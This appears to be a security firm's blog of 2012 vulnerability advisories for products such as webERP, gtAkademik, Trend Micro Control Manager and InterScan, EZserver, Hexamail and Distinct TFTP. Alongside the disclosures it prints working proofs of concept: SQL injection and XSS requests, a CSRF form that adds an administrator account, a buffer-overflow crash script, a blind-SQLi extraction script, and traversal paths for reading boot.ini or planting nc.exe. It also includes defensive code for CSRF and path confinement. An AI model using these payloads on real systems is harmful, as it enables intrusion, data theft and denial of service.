Blog
This blog is our 'security journal': notes on what we have done, such as security research, vulnerability discovery, proofs of concept for exploits seen in the wild, and our exploit development process.
This blog is provided for informational and educational purposes only; we shall not be responsible or liable for the accuracy or availability of any information appearing or available on this blog. Please refer to our Terms of Use for more info.
Centreon Enterprise Server 2.3.3 – 2.3.9-4 Blind SQL Injection
We discovered this vulnerability while looking for alternative network monitoring software. We know and love Nagios, and Centreon provides a very nice interface on top of it: the backend is still Nagios, but the interface is completely different and makes network monitoring easier to work with. You can view more features of Centreon here.
Fully Automated Nagios (FAN) also ships Centreon, so the vulnerability affects FAN as well.
PC Media Antivirus Insecure Library Loading Vulnerability
PC Media Antivirus (PCMAV) is an antivirus made in Indonesia. PCMAV became quite popular in 2006, when many Indonesian virus writers were actively spreading malware that infected most computers in the country. At that time several antivirus products specialising in Indonesian viruses appeared, the popular ones being SmadAV, PC Media Antivirus (PCMAV) and Ansav.
PCMAV is still a popular antivirus on Indonesian computers today. It is usually installed alongside another popular free antivirus such as Avast, AVG or Avira AntiVir, and some companies rely on it specifically for detecting locally made viruses.
An antivirus is endpoint protection that detects malicious programs coming from outside the computer, so it should itself be built with good protection and a sound design, and it should not be vulnerable to exploitation.
SmadAV 9.1 Null Pointer Dereference Vulnerability
SmadAV antivirus 9.1 is susceptible to a null pointer dereference. The application does not properly validate the scanner input that is passed into smadengine.dll. Successful exploitation crashes the application, since it ends up dereferencing a null pointer (EAX = 00000000).
The vulnerable function lies in smadengine.dll. Note that the IsBadReadPtr check in the listing below is applied to the address of the stack slot that holds the pointer (lea ecx, [ebp+var_3C8]), not to the pointer value itself; the value is then loaded into ESI and dereferenced at [esi+0Ch] without any check, so a null pointer passes the check and crashes the scanner.
SmadEngine.dll
.text:100051B2 mov [ebp+var_414], ebx
.text:100051B8 cmp word ptr [ebp+var_3DC], 0
.text:100051C0 jbe loc_1000530D
.text:100051C6 call sub_100060C0
.text:100051CB push 4 ; ucb
.text:100051CD lea ecx, [ebp+var_3C8]
.text:100051D3 push ecx ; lp
.text:100051D4 call ds:IsBadReadPtr
.text:100051DA cmp eax, 1
.text:100051DD jz loc_1000530D
.text:100051E3 mov esi, [ebp+var_3C8]
.text:100051E9 mov eax, [esi+0Ch]
.text:100051EC cmp [ebp+var_404], eax
.text:100051F2 jb short loc_100051FF
.text:100051F4 mov ecx, eax
.text:100051F6 sub ecx, [esi+14h]
.text:100051F9 mov [ebp+var_3E8], ecx
Called from
.text:10005574 inc ebx
.text:10005575 add esi, 28h
.text:10005578 mov [ebp+var_3C8], esi
.text:1000557E add [ebp+var_3DC], 0FFFFh
.text:10005588 jmp loc_100051B2
Impact
The application crashes and is forced to close. An attacker could write a virus or other malware that deliberately triggers the crash and, once the antivirus has been terminated, infects the system unhindered.
Solution
No solution from vendor.
Credit
Mada R. Perdhana for the vulnerability research, proof-of-concept script and testing on various Windows versions.
References
http://www.exploit-db.com/exploits/22653
http://www.spentera.com/advisories/2012/SPN-09-2012.html
Trend Micro Control Manager SQL Injection Vulnerability
Overview
A SQL injection vulnerability was found in Trend Micro Control Manager. A remote attacker can extract sensitive data such as passwords through blind SQL injection.
Vulnerability Description
Trend Micro Control Manager prior to version 5.5 build 1823 (English and Japanese versions) and version 6 prior to build 1449 (English version only) is susceptible to SQL injection. The application does not properly filter user-supplied input. Successful exploitation could allow arbitrary SQL commands to reach the back-end database, for example SQL commands that upload and execute arbitrary code on the target system.
The vulnerable parameter is the 'id' parameter in the GET request to the AdHocQuery_Processor.aspx page. According to the Trend Micro Control Manager help, an Ad Hoc Query is a direct request to the Control Manager database for information. The query uses data views to narrow the request and improve performance. After specifying the data view, users can further narrow their search by specifying filtering criteria for the request.
Version Affected
Trend Micro Control Manager 5.5 prior to 5.5.0.1823 (English and Japanese version)
Trend Micro Control Manager 6 prior to 6.0.0.1449 (English version)
Impact
An attacker with access to the Trend Micro Control Manager web interface can conduct a SQL injection attack, which could result in information leakage, arbitrary code execution and/or denial of service.
Solution
The vendor has stated that these vulnerabilities are addressed in critical patches for Trend Micro Control Manager 5.5 and 6.0.
Critical patch available for SQL injection attacks in Control Manager (TMCM)
http://esupport.trendmicro.com/solution/en-us/1061043.aspx
Control Manager 6 – Product Patch
http://downloadcenter.trendmicro.com/index.php?clk=tbl&clkval=4202#fragment-4248
Control Manager 5.5 – Product Patch
http://downloadcenter.trendmicro.com/index.php?clk=tbl&clkval=1763#fragment-1845
Trend Micro Control Manager 5.5 – Patch (Japanese only)
http://downloadcenter.trendmicro.com/index.php?regs=jp&clk=tbl&clkval=3432#fragment-3462
Proof of Concept
http://www.spentera.com/advisories/2012/trendmicro_timebased_sqli.py.txt
References
JVN#42014489 – http://jvn.jp/en/jp/JVN42014489/index.html
VU#950795 – http://www.kb.cert.org/vuls/id/950795
Credit
Tom Gregory for the vulnerability research.
Hanny Haliwela for the proof of concept.
Mada R. Perdhana for reporting to JPCERT/CC
webERP <=4.08.4 SQL Injection Vulnerability
Overview
webERP <=4.08.4 contains a SQL injection vulnerability that may allow authenticated users to execute SQL queries, potentially viewing or modifying data.
Vulnerability Description
webERP is a mature open-source ERP system providing best-practice, multi-user business administration and accounting tools over the web. The vulnerability sits in the WO (work order) parameter of WorkOrderEntry.php in the Manufacturing menu. Lack of input validation on the WO parameter allows a malicious user to inject SQL into the query.
Proof of Concept
Time-based Blind SQL Injection
POST /weberp/WorkOrderEntry.php HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=n9g1ts0s7oigk88eto8f8nm111
Content-Type: application/x-www-form-urlencoded
Content-Length: 207
FormID=ff60696dab6b35c56558628b7237a624be19ad11&WO=33' AND SLEEP(5) AND '1'='1&StockLocation=MEL&StartDate=14%2F09%2F2012&RequiredBy=14%2F09%2F2012&NumberOfOutputs=0&submit=&StockCat=All&Keywords=&StockCode=
Error-based SQL Injection
POST /weberp/WorkOrderEntry.php HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=n9g1ts0s7oigk88eto8f8nm111
Content-Type: application/x-www-form-urlencoded
Content-Length: 207
FormID=ff60696dab6b35c56558628b7237a624be19ad11&WO=33'&StockLocation=MEL&StartDate=14%2F09%2F2012&RequiredBy=14%2F09%2F2012&NumberOfOutputs=0&submit=&StockCat=All&Keywords=&StockCode=
Solution
Upgrade to the latest version from http://sourceforge.net/projects/web-erp/
References
http://www.weberp.org/
http://www.spentera.com/advisories/2012/SPN-06-2012.html
Credit
Tom Gregory from Spentera Research.
Trend Micro InterScan Messaging Security Suite Multiple Vulnerabilities
Overview
Trend Micro InterScan Messaging Security Suite is vulnerable to cross-site scripting and cross-site request forgery.
Software Description
TrendMicro Interscan Messaging Security is the industry’s most comprehensive mail gateway security. Choose state-of-the-art software or a hybrid solution with on-premise virtual appliance and optional cloud pre-filter that blocks the vast majority of spam and malware outside your network. Plus our Data Privacy and Encryption Module secure outbound data to ensure privacy and regulatory compliance.
Vulnerability Overview
Proofs of concept for the vulnerabilities follow:
Cross-site Scripting (CVE-2012-2995) (CWE-79)
Persistent/Stored XSS
hxxps://127.0.0.1:8445/addRuleAttrWrsApproveUrl.imss?wrsApprovedURL=xssxss"><script>alert('XSS')</script>
Non-persistent/Reflected XSS
hxxps://127.0.0.1/initUpdSchPage.imss?src="><script>alert('XSS')</script>
Cross-Site Request Forgery (CVE-2012-2996) (CWE-352)
CSRF: add an account with administrator privileges
<html>
<body>
<form action="hxxps://127.0.0.1:8445/saveAccountSubTab.imss" method="POST">
<input type="hidden" name="enabled" value="on" />
<input type="hidden" name="authMethod" value="1" />
<input type="hidden" name="name" value="quorra" />
<input type="hidden" name="password" value="quorra.123" />
<input type="hidden" name="confirmPwd" value="quorra.123" />
<input type="hidden" name="tabAction" value="saveAuth" />
<input type="hidden" name="gotoTab" value="saveAll" />
<input type=”submit” value=”CSRF” />
</form>
</body>
</html>
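The form above works because saveAccountSubTab.imss accepts any POST that carries the victim's session cookie. The following is an added example, not Trend Micro code, of the server-side check that defeats it: a per-session synchronizer token that the attacker's page cannot know, plus a check that the request's Origin or Referer is the management interface itself. The origin (taken from the PoC), the server key and the token field name are assumptions.

```python
"""Server-side CSRF defence for a state-changing handler such as saveAccountSubTab.imss:
a session-bound synchronizer token plus an Origin/Referer check.  Added example, not
Trend Micro code; the origin, key and field names are assumptions."""
import hashlib
import hmac
from urllib.parse import urlsplit

APP_ORIGIN = "https://127.0.0.1:8445"        # the management interface in the advisory's PoC
SERVER_KEY = b"constructed-server-key"       # constructed; load from protected config in reality
TOKEN_FIELD = "csrf_token"                   # hidden form field the legitimate page would carry


def issue_csrf_token(session_id):
    """Per-session token = HMAC-SHA256(server key, session id).  The attacker's page
    cannot read the victim's session id or the key, so it cannot produce this value."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def request_allowed(session_id, headers, form):
    """Return (allowed, reason).  Both checks must pass before the account is saved."""
    # 1. Source check.  Browsers send Origin on cross-site POSTs (and Referer on most
    #    requests); a form auto-submitted from the attacker's page carries the attacker's origin.
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return False, "no Origin or Referer header"
    parts = urlsplit(src)
    src_origin = "%s://%s" % (parts.scheme, parts.netloc)
    if src_origin != APP_ORIGIN:
        return False, "cross-origin request from %s" % src_origin
    # 2. Token check, in constant time so the comparison does not leak the token.
    expected = issue_csrf_token(session_id)
    if not hmac.compare_digest(form.get(TOKEN_FIELD, ""), expected):
        return False, "missing or wrong CSRF token"
    return True, "ok"


# Exactly the fields the advisory's CSRF page submits (constructed to mirror the PoC form)
ATTACK_FORM = {
    "enabled": "on", "authMethod": "1", "name": "quorra", "password": "quorra.123",
    "confirmPwd": "quorra.123", "tabAction": "saveAuth", "gotoTab": "saveAll",
}


def demo(session_id="victim-session"):
    """Show the attack form being rejected and a legitimate same-origin post accepted."""
    results = {}
    # Victim's browser submits the attacker's auto-posting form: attacker origin, no token
    results["attack"] = request_allowed(session_id, {"Origin": "https://attacker.example"}, ATTACK_FORM)
    # Legitimate admin form: same origin and the token the page rendered for this session
    good_form = dict(ATTACK_FORM, **{TOKEN_FIELD: issue_csrf_token(session_id)})
    results["legit"] = request_allowed(session_id, {"Origin": APP_ORIGIN}, good_form)
    return results


if __name__ == "__main__":
    for name, (ok, why) in demo().items():
        print("%-6s allowed=%s (%s)" % (name, ok, why))
```

The two checks cover different failure modes: the token stops a forged request even when a proxy strips Referer, and the origin check stops the request even if the token leaks. Neither helps against the stored XSS reported in the same product, since script running at the application's own origin can read the token from the page and submit a same-origin request, so the XSS must be fixed too.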
Solution
We are currently not aware of any vendor solution; contact the vendor for a patch or update of the product.
As a temporary mitigation, restrict access to the application's management interface so that unauthorized users cannot make use of these vulnerabilities.
References
http://www.spentera.com/advisories/2012/SPN-05-2012.html
http://cwe.mitre.org/data/definitions/352.html
http://cwe.mitre.org/data/definitions/79.html
http://www.trendmicro.com/us/enterprise/network-security/interscan-message-security/index.html
Credit
Tom Gregory from Spentera Research.
gtAkademik Gamatechno SQL Injection and Persistent XSS
Overview
gtAkademik Gamatechno web application is susceptible to SQL Injection and Cross-site Scripting (XSS).
Vulnerability Details and POC
Stored/Persistent XSS
The web application lets an attacker store script in the database (stored XSS), because there is no sanitisation of user input. Two modules are affected: the Message module and the Update Profile module.
Persistent XSS in Message Module
The Message module provides internal messaging inside gtAkademik; we can send a crafted message containing script to other users, for example to the administrator.
POST /index.php?pModule=zsinppiZmQ==&pSub=zsinppiZmQ==&pAct=0dWjlpylpw== HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://1.1.1.1/index.php?pModule=zsinppiZmQ==&pSub=xNKho6almcWem9isk5uW&pAct=18yZqg==
Cookie: PHPSESSID=XXXXXXXXXXXXXXXXXXXXXXX
Content-Type: application/x-www-form-urlencoded
Content-Length: 169
data%5BMessageSender%5D=XXXXXXXXXX&data%5BMessageReceiver%5D=XXXXXXXXXX&data%5BMessageTitle%5D=%3Cscript%3E&data%5BMessageContent%5D=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&act=doCompose&compBtn=Kirim
Persistent XSS in the User Profile module (saving the user profile)
This module updates the user's profile. Script injected into a profile field is saved to the database, so everyone who views the profile is exposed to the XSS attack.
POST /index.php?pModule=1taZpQ==&pSub=0dWjmaCemQ==&pAct=xsedpw== HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://1.1.1.1/index.php?pModule=1taZpQ==&pSub=0dWjmaCemQ==&pAct=xsedpw==&sia=ydeoo3FhY5dibpNyaWJilWdqY2RhqsrPmM6Xy5+hoKfOzGOjpqSox52V2J6kqprHnqxfnaCbxtpl1p3YqpuVnY/TnKM=
Cookie: PHPSESSID=XXXXXXXXXXXXXXXXXXXXXXX
Content-Type: application/x-www-form-urlencoded
Content-Length: 213
tanggal=02%2F08%2F1988&alamat_asal=XXXXXXXXXX&alamat=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&no_hp_mhs=XXXXXXXXXX&nama_ayah=&nama_ibu=&alamat_ortu=&no_telp_ortu=&simpan=Simpan
SQL Injection
The web application is also susceptible to SQL injection, again because there is no sanitisation, which allows an attacker to extract the contents of the database, including sensitive data such as the credentials stored in it.
The 'id' parameter is vulnerable to SQL injection:
http://1.1.1.1/mod=transaksi_registrasi_pmb&sub=transaksi_detail&do=daftar&id=129000204' AND '1'='1
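The three blind injections on this page (webERP's WO parameter and Trend Micro Control Manager's id parameter, both time-based, and gtAkademik's id parameter, boolean-based) are exploited the same way: ask the database one yes/no question per character and binary-search the character code. The script below is an added example, not Spentera's proof-of-concept script, and its transport is a constructed stand-in for the vulnerable application: the "secret" it recovers, the users/password subquery and the response formats are all invented for the demonstration. The predicate is MySQL syntax as used against webERP; Control Manager sits on Microsoft SQL Server, where the time-based branch would use IF (...) WAITFOR DELAY '0:0:5' instead of IF(..., SLEEP(5), 0).

```python
"""Blind SQL injection extraction: a binary search over one yes/no question per
character, driven either by response time (webERP WO=, TMCM id=) or by a visible
difference in the page (gtAkademik id=).  Added example, not Spentera's PoC; the
transport below is a constructed stand-in for the vulnerable application."""
import re

SIMULATED_SECRET = "s3cr3t!"                          # constructed value the fake back-end holds
SUBQUERY = "(SELECT password FROM users LIMIT 1)"     # hypothetical target column
SLEEP_SECONDS = 5


def predicate(pos, guess):
    """MySQL predicate that is true when the pos-th character's code exceeds guess."""
    return "ASCII(SUBSTRING(%s,%d,1))>%d" % (SUBQUERY, pos, guess)


def time_payload(base, pos, guess, delay=SLEEP_SECONDS):
    """Time-based form (webERP WO=33, TMCM id=): the server stalls only when true."""
    return "%s' AND IF(%s,SLEEP(%d),0) AND '1'='1" % (base, predicate(pos, guess), delay)


def boolean_payload(base, pos, guess):
    """Boolean form (gtAkademik id=129000204): the record is shown only when true."""
    return "%s' AND %s AND '1'='1" % (base, predicate(pos, guess))


_PRED = re.compile(r"ASCII\(SUBSTRING\(.*?,(\d+),1\)\)>(\d+)")


def _fake_db_evaluates(payload):
    """Stand-in for the database: evaluate the injected predicate against the constructed
    secret.  Past the end of the string SUBSTRING yields '' and ASCII('') is 0, as in MySQL."""
    pos, guess = (int(x) for x in _PRED.search(payload).groups())
    ch = SIMULATED_SECRET[pos - 1:pos]
    return (ord(ch) if ch else 0) > guess


def fake_timed_request(payload):
    """Seconds a client would measure for the request (constructed: base latency plus SLEEP)."""
    return 0.12 + (SLEEP_SECONDS if _fake_db_evaluates(payload) else 0)


def fake_page_request(payload):
    """Body a client would receive (constructed: the record row or an empty table)."""
    return "<td>129000204</td>" if _fake_db_evaluates(payload) else "<td>No data</td>"


def time_oracle(pos, guess):
    # A real client times an HTTP request here; half the SLEEP value separates the two cases.
    return fake_timed_request(time_payload("33", pos, guess)) >= SLEEP_SECONDS / 2.0


def boolean_oracle(pos, guess):
    return "No data" not in fake_page_request(boolean_payload("129000204", pos, guess))


def extract(oracle, max_len=64):
    """Recover the string one character at a time; each character costs at most 7 requests
    because the binary search narrows 0..127 instead of trying every printable character."""
    out = []
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:                      # invariant: the character code lies in [lo, hi]
            mid = (lo + hi) // 2
            if oracle(pos, mid):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:                         # ASCII('') == 0: walked past the end of the value
            break
        out.append(chr(lo))
    return "".join(out)


if __name__ == "__main__":
    print("time-based   :", extract(time_oracle))
    print("boolean-based:", extract(boolean_oracle))
```

Against a live target the two fake_* functions become one timed HTTP request (POST for webERP, GET for the other two) with the payload substituted into the vulnerable parameter; everything else stays the same. The time-based threshold of half the SLEEP value is what keeps ordinary network jitter from flipping an answer, and the SLEEP duration should be raised rather than the threshold lowered when the link is slow.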
Impact
Malicious authenticated users can exploit the XSS to execute arbitrary script in the context of a logged-in user's session. Beyond that, authenticated users may use the SQL injection to execute arbitrary SQL queries, potentially viewing or modifying data in the backend database.
Solution
We are currently not aware of any update or patch available from the vendor.
References
http://www.spentera.com/advisories/2012/SPN-01-2012.html
Credit
Hanny Haliwela and Mada Perdhana from Spentera Research.
Ezhometech Ezserver <=6.4.017 Stack Overflow Vulnerability
EZserver version 6.4.017 or below contains a buffer overflow vulnerability that may be exploited to cause a denial of service or arbitrary code execution.
Software Description
EZserver is a video server that streams Full HD video to various devices.
Developer Website
http://www.ezhometech.com/ezserver.htm
Vulnerability Details
A buffer overflow exists in URL handling: sending a long GET request to the server on port 8000 causes the server process to exit and may allow malicious code injection.
Further research found that the application does not check the HTTP method at all, so sending a long string of any kind to port 8000 will crash the program.
Vendor timeline
06/11/2012 – Bug found
06/12/2012 – Vendor contacted
06/16/2012 – No response, advisory released.
Proof of Concept
#!/usr/bin/env python3
# Proof of concept: Ezserver <= 6.4.017 buffer overflow (crashes the server; no code execution)
import socket
import sys

if len(sys.argv) != 3:
    print("[*] Proof of Concept of Ezserver <=6.4.017 Buffer Overflow")
    print("[*] by Spentera Research - research[at]spentera[dot]com")
    print("[*] http://www.spentera.com/resources/security-advisory\n")
    print("[*] Usage: python %s ip port" % sys.argv[0])
    sys.exit(0)

host = sys.argv[1]
port = int(sys.argv[2])
junk = b"\x41" * 10000          # 10000 'A's: overruns the URL buffer
payload = junk

print("[!] Connecting to %s on port %d" % (host, port))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((host, port))
    print("[+] Launching attack..")
    # The method and version are irrelevant to the crash; only the length matters
    s.send(b"GET /" + payload + b" HTTP/1.0\r\n\r\n")
    s.close()
except socket.error:
    print("[x] Could not connect to the server x_x")
    sys.exit()
References
Exploit Database: http://www.exploit-db.com/exploits/19266/
Metasploit: http://www.metasploit.com/modules/exploit/windows/http/ezserver_http
Hexamail Server <= 4.4.5 Persistent XSS Vulnerability
Hexamail Server version 4.4.5 or below is vulnerable to persistent cross-site scripting (XSS) via HTML email.
Software Description
Hexamail provides intelligent email software solutions. Leveraging the latest advanced techniques, such as Bayesian matching, our products enable customers to eliminate email intrusions such as spam, malware, spyware, phishing attacks and virus.
Vulnerability Description
Hexamail Server suffers from a persistent XSS vulnerability in the mail body, allowing a malicious user to execute script in a victim's browser to hijack user sessions, redirect users or otherwise take control of the user's browser.
Proof of concept
When a malicious script is sent to the victim by email, the webmail automatically loads the mail body, so the script runs without any action on the user's part.
root@bt:~/# cat > meal.txt
<html>
<body>
<h1> XSS pop up</h1>
<script>alert('Hi, what is this?');</script>
</body>
</html>
root@bt:~/#
Send email to the victim:
root@bt:~/# sendemail -f bob@example.com -t david@example.com -xu bob@example.com -xp bob123 -u "Want some meal..?" -o message-file=meal.txt -s mail.example.com
Vendor timeline
04/20/2012 – Issue discovered
04/20/2012 – Vendor contacted
04/27/2012 – Vendor responds and provides a new upgrade version
04/30/2012 – Issue still present in the latest upgrade version
04/30/2012 – Vendor says they are still fixing the problem
05/10/2012 – Email sent to ask about the fix progress
06/02/2012 – No response. Sent to Secunia.
Solution
Not available.
References
http://www.hexamail.com
http://www.spentera.com/advisories/2012/SPN-02-2012.html
Distinct TFTP Server <=3.10 Directory Traversal Vulnerability
Overview
Distinct TFTP Server is part of Distinct Intranet Servers, made by Distinct Corp. Distinct TFTP Server version 3.10 is susceptible to a directory traversal attack. An attacker can exploit this vulnerability to retrieve or upload files outside the TFTP server's root directory.
Software Description
From Distinct website:
Distinct Intranet Servers, which includes FTP Server, TFTP, LPD, BOOTP and NFS, bring quality server power to your network with no additional hardware investment. These servers allow you to make use of your PCs to share important services among your users.
Vulnerability Details and Attack Vector
The vulnerability is caused by improper validation of GET and PUT requests containing dot-dot-slash ('../') sequences, which allows attackers to read or write arbitrary files.
By including dot-dot-slash sequences in a GET or PUT request, it is possible to retrieve operating system files such as boot.ini, or to upload a file (nc.exe, say) into the Windows %systemroot% (C:\WINDOWS\system32\).
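On the wire a TFTP "get" is a read request (RRQ, opcode 1) and a "put" is a write request (WRQ, opcode 2), each carrying the filename as a NUL-terminated string; the traversal is simply that filename containing `../`. The following is an added example, not Distinct's code: it builds the two requests from the advisory, and shows the confinement check a server needs, which resolves the requested name to an absolute path and refuses anything that does not land under the configured root. The root directory is an assumption.

```python
"""TFTP directory traversal: build the RRQ/WRQ the attack sends, and the root-confinement
check a server needs.  Added example, not Distinct's code; the root path is an assumption."""
import os
import struct

TFTP_RRQ = 1   # read request (the client's "get")
TFTP_WRQ = 2   # write request (the client's "put")


def build_request(opcode, filename, mode="octet"):
    """RFC 1350 request packet: opcode (2 bytes), filename, NUL, mode, NUL."""
    if opcode not in (TFTP_RRQ, TFTP_WRQ):
        raise ValueError("opcode must be RRQ (1) or WRQ (2)")
    return (struct.pack("!H", opcode) + filename.encode("latin-1") + b"\x00"
            + mode.encode("ascii") + b"\x00")


def parse_request(packet):
    """Inverse of build_request; returns (opcode, filename, mode)."""
    if len(packet) < 4:
        raise ValueError("short packet")
    opcode = struct.unpack("!H", packet[:2])[0]
    fields = packet[2:].split(b"\x00")
    if len(fields) < 3:                 # filename, mode, and the empty field after the last NUL
        raise ValueError("missing NUL terminator")
    return opcode, fields[0].decode("latin-1"), fields[1].decode("ascii")


def resolve_under_root(root, requested):
    """Return the absolute path to serve, or None if the request would escape root.
    The decision is made on the normalised absolute path, so '../', 'a/../../' and
    Windows-style '..\\' all collapse to a path that either stays inside root or does not."""
    if not requested:
        return None
    rel = requested.replace("\\", "/").lstrip("/")     # treat '\' like '/', drop a leading '/'
    root_abs = os.path.abspath(root)
    full = os.path.normpath(os.path.join(root_abs, rel))
    if full == root_abs or not full.startswith(root_abs + os.sep):
        return None                                     # outside root, or the root itself
    return full


def serve(root, packet):
    """Dispatch one request the way a hardened server would: ('ok', path) or ('error', reason)."""
    opcode, filename, mode = parse_request(packet)
    if opcode not in (TFTP_RRQ, TFTP_WRQ):
        return "error", "unsupported opcode %d" % opcode
    path = resolve_under_root(root, filename)
    if path is None:
        return "error", "access violation: %r escapes the TFTP root" % filename
    return "ok", path


if __name__ == "__main__":
    # The advisory's two requests, plus a legitimate one, against a constructed root
    for op, name in ((TFTP_RRQ, "../../boot.ini"),
                     (TFTP_WRQ, "..\\..\\WINDOWS\\system32\\nc.exe"),
                     (TFTP_RRQ, "pxelinux.0")):
        print(name, "->", serve("/srv/tftp", build_request(op, name)))
```

The check deliberately works on the normalised path rather than by searching the filename for `..`: a pattern match misses `..\`, doubled separators and names that step out and back in, while the path comparison treats all of them the same. On a real server the root should also be a dedicated directory with no symbolic links pointing outside it, since normpath does not follow links.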